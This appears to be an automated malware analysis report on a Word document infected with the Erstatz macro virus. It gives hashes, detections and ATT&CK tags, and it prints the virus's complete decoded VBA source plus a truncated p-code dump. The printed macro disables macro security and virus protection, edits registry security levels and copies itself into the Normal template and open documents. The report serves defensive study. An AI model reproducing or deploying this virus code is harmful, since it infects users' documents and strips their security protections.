Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 da664cf22f7e21ce…

MALICIOUS

Office (OLE)

28.5 KB Created: 1999-06-04 19:15:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 5bb8bffa0a219f2e7f38de4dd67e4f59 SHA-1: 28ab4c9f5f8f633247402142727e42dde5e04c57 SHA-256: da664cf22f7e21ce2bc7f40b5e621e9b1c991d42a5be24c7e6e5714e7902128d
180 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains VBA macros, specifically a Document_Open macro, which is a common technique for executing malicious code within Office documents. The script attempts to disable macro security warnings and manipulate the NormalTemplate and ActiveDocument's VBA components, indicating an intent to persist or execute further malicious actions. The ClamAV detections 'Doc.Trojan.Erstatz-1' and 'Win.Trojan.wmvg-1' further support the malicious nature of this file.

Heuristics 3

  • ClamAV: Doc.Trojan.Erstatz-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Erstatz-1
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 7029 bytes
SHA-256: 81241f92d979a3144aaf29bcf890bc7f5363aa76c7972c67da4680eb1c6802d7
Detection
ClamAV: Win.Trojan.wmvg-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Document_Close()
'
'Erstatz v1.0
On Error Resume Next
GoTo setup
infekt:
Set nrmal = NormalTemplate.VBProject.VBComponents(1).CodeModule
Set aktiv = ActiveDocument.VBProject.VBComponents(1).CodeModule
If nrmal.lines(2, 1) <> "'" Then
nrmal.deletelines 1, nrmal.countoflines
nrmal.insertlines 2, aktiv.lines(2, aktiv.countoflines)
nrmal.insertlines 1, "Sub Document_Close()"
'
For n = 9 To nrmal.countoflines
Randomize
'
'
'
ma = Int((Rnd * 4) + 1)
'
If nrmal.lines(n, 1) = "'" And ma >= 2 Then
nrmal.deletelines n, 1
'
je = je + 1
If je = 15 Then GoTo ausgang
'
End If
Next n
End If
'
ausgang:
'
'
If aktiv.lines(2, 1) <> "'" Then
'
'
aktiv.deletelines 1, aktiv.countoflines
aktiv.insertlines 2, nrmal.lines(2, nrmal.countoflines)
aktiv.insertlines 1, "Sub Document_Open()"
For i = 9 To aktiv.countoflines
Randomize
ma = Int((Rnd * 4) + 1)
If ma <= 2 Then
aktiv.insertlines i, "'"
End If
Next i
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, fileformat:=wdFormatDocument
End If
GoTo done
setup:
Options.SaveNormalPrompt = False
Options.SendMailAttach = True
Options.ConfirmConversions = False
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Else
CommandBars("Tools").Controls("Macro").Enabled = False
Options.VirusProtection = False
End If
GoTo infekt:
done:
End Sub
        


' Processing file: /opt/analyzer/scan_staging/4615a531c18e42dbb481bc23158981ab.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 3842 bytes
' Line #0:
' 	FuncDefn (Sub Document_Close())
' Line #1:
' 	QuoteRem 0x0000 0x0000 ""
' Line #2:
' 	QuoteRem 0x0000 0x000C "Erstatz v1.0"
' Line #3:
' 	OnError (Resume Next) 
' Line #4:
' 	GoTo setup 
' Line #5:
' 	Label infekt 
' Line #6:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	Set nrmal 
' Line #7:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	Set aktiv 
' Line #8:
' 	LitDI2 0x0002 
' 	LitDI2 0x0001 
' 	Ld nrmal 
' 	ArgsMemLd lines 0x0002 
' 	LitStr 0x0001 "'"
' 	Ne 
' 	IfBlock 
' Line #9:
' 	LitDI2 0x0001 
' 	Ld nrmal 
' 	MemLd countoflines 
' 	Ld nrmal 
' 	ArgsMemCall deletelines 0x0002 
' Line #10:
' 	LitDI2 0x0002 
' 	LitDI2 0x0002 
' 	Ld aktiv 
' 	MemLd countoflines 
' 	Ld aktiv 
' 	ArgsMemLd lines 0x0002 
' 	Ld nrmal 
' 	ArgsMemCall insertlines 0x0002 
' Line #11:
' 	LitDI2 0x0001 
' 	LitStr 0x0014 "Sub Document_Close()"
' 	Ld nrmal 
' 	ArgsMemCall insertlines 0x0002 
' Line #12:
' 	QuoteRem 0x0000 0x0000 ""
' Line #13:
' 	StartForVariable 
' 	Ld n 
' 	EndForVariable 
' 	LitDI2 0x0009 
' 	Ld nrmal 
' 	MemLd countoflines 
' 	For 
' Line #14:
' 	ArgsCall Read 0x0000 
' Line #15:
' 	QuoteRem 0x0000 0x0000 ""
' Line #16:
' 	QuoteRem 0x0000 0x0000 ""
' Line #17:
' 	QuoteRem 0x0000 0x0000 ""
' Line #18:
' 	Ld Rnd 
' 	LitDI2 0x0004 
' 	Mul 
' 	Paren 
' 	LitDI2 0x0001 
' 	Add 
' 	FnInt 
' 	St ma 
' Line #19:
' 	QuoteRem 0x0000 0x0000 ""
' Line #20:
' 	Ld n 
' 	LitDI2 0x0001 
' 	Ld nrmal 
' 	ArgsMemLd lines 0x0002 
' 	LitStr 0x0001 "'"
' 	Eq 
' 	Ld ma 
' 	LitDI2 0x0002 
' 	Ge 
' 	And 
' 	IfBlock 
' Line #21:
' 	Ld n 
' 	LitDI2 0x0001 
' 	Ld nrmal 
' 	ArgsMemCall deletelines 0x0002 
' Line #22:
' 	QuoteRem 0x0000 0x0000 ""
' Line #23:
' 	Ld je 
' 	LitDI2 0x0001 
' 	Add 
' 	St je 
' Line #24:
' 	Ld je 
' 	LitDI2 0x000F 
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	GoTo ausgang 
' 	EndIf 
' Line #25:
' 	QuoteRem 0x0000 0x0000 ""
' Line 
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.